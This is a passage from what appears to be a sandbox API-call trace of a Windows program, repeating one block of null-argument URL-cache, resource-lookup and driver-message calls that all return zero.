lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.923] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.923] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.923] GetUserDefaultLangID () returned 0x409 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.923] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.938] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.939] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.939] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.939] GetUserDefaultLangID () returned 0x409 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.939] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.939] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.939] GetUserDefaultLangID () returned 0x409 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.939] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.939] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.939] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.939] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.939] GetUserDefaultLangID () returned 0x409 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.939] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.940] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.940] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.940] GetUserDefaultLangID () returned 0x409 [0185.940] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.940] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.940] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.940] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.940] GetUserDefaultLangID () returned 0x409 [0185.940] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.940] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.940] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.940] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.940] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.940] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.940] GetUserDefaultLangID () returned 0x409 [0185.940] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.941] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.941] GetUserDefaultLangID () returned 0x409 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.941] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.941] GetUserDefaultLangID () returned 0x409 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.941] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.941] GetUserDefaultLangID () returned 0x409 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.941] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.941] GetUserDefaultLangID () returned 0x409 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.941] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.941] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.941] GetUserDefaultLangID () returned 0x409 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.941] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.941] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.941] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.942] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.942] GetUserDefaultLangID () returned 0x409 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.942] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.942] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.942] GetUserDefaultLangID () returned 0x409 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.942] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.942] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.942] GetUserDefaultLangID () returned 0x409 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.942] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.942] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.942] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.942] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.942] GetUserDefaultLangID () returned 0x409 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.942] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.943] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.943] GetUserDefaultLangID () returned 0x409 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.943] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.943] GetUserDefaultLangID () returned 0x409 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.943] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.943] GetUserDefaultLangID () returned 0x409 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.943] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.943] GetUserDefaultLangID () returned 0x409 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.943] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.943] GetUserDefaultLangID () returned 0x409 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.943] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.943] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.943] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.944] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.944] GetUserDefaultLangID () returned 0x409 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.944] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.944] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.944] GetUserDefaultLangID () returned 0x409 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.944] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.944] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.944] GetUserDefaultLangID () returned 0x409 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.944] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.944] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.944] GetUserDefaultLangID () returned 0x409 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.944] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.944] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.944] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.944] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.944] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.945] GetUserDefaultLangID () returned 0x409 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.945] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.945] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.945] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.945] GetUserDefaultLangID () returned 0x409 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.945] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.945] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.945] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 